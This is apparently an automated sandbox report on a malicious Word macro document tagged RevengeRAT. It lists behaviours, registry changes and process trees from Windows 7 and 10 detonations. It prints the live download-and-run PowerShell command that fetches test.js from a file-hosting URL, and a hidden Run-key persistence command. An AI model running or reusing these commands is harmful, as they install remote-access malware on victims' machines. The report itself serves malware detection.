Analysis Overview
SHA256
861375605b6f4b622556d5b04f6329440a26b38dfa066b114c55d258ac4895bc
Threat Level: Known bad
The file 861375605b6f4b622556d5b04f6329440a26b38dfa066b114c55d258ac4895bc.doc was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
RevengeRAT
Suspicious Office macro
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Command and Scripting Interpreter: JavaScript
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-02 02:03
Signatures
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-02 02:03
Reported
2024-08-02 02:06
Platform
win7-20240705-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEA2FC4E-B1A2-43D0-8D95-40B52FB729E3}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEA2FC4E-B1A2-43D0-8D95-40B52FB729E3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\TypeLib | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\TypeLib\{FEA2FC4E-B1A2-43D0-8D95-40B52FB729E3}\2.0\FLAGS | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 200000001a00eebbfe2300001000d09ad3fd8f23af46adb46c85480369c700000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEA2FC4E-B1A2-43D0-8D95-40B52FB729E3}\2.0\0\win32 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\TypeLib\{FEA2FC4E-B1A2-43D0-8D95-40B52FB729E3}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\861375605b6f4b622556d5b04f6329440a26b38dfa066b114c55d258ac4895bc.docm"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/rgZiV9iE/8r-wKti0.d13d81b1839707719820361a64160ba8 -o test.js; explorer.exe test.js
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\system32\explorer.exe" test.js
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Network
Files
memory/2316-0-0x000000002FB81000-0x000000002FB82000-memory.dmp
memory/2316-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2316-2-0x000000007169D000-0x00000000716A8000-memory.dmp
memory/2316-11-0x0000000000370000-0x0000000000470000-memory.dmp
memory/2316-12-0x000000007169D000-0x00000000716A8000-memory.dmp
memory/2316-13-0x0000000000370000-0x0000000000470000-memory.dmp
memory/2316-21-0x0000000000370000-0x0000000000470000-memory.dmp
memory/2316-20-0x0000000000370000-0x0000000000470000-memory.dmp
memory/1772-30-0x0000000004100000-0x0000000004110000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 6a0aa66ab75803d0f7ea64f930dbc722 |
| SHA1 | 7df9c00504c2e38360df6e2413f4fc367a43e598 |
| SHA256 | 0dd096845213dd2184ffeae0fbce26f446ce44d0e05392804992c3a9a7cded5d |
| SHA512 | 95fb7a77ce23d4f53cc566a196463807ffd4d4da2cb4983695069d07dce7831260ccebbcfc37751c7b105bb0b8acf9a2ff14b012e2c806bfd21acf26b32422a3 |
memory/2316-50-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2316-51-0x000000007169D000-0x00000000716A8000-memory.dmp
memory/2316-52-0x0000000000370000-0x0000000000470000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-02 02:03
Reported
2024-08-02 02:06
Platform
win10v2004-20240730-en
Max time kernel
138s
Max time network
146s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
RevengeRAT
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_l = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft SyS\\skowf.ps1' \";exit" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1164 set thread context of 2860 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2927035347-1736702767-189270196-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
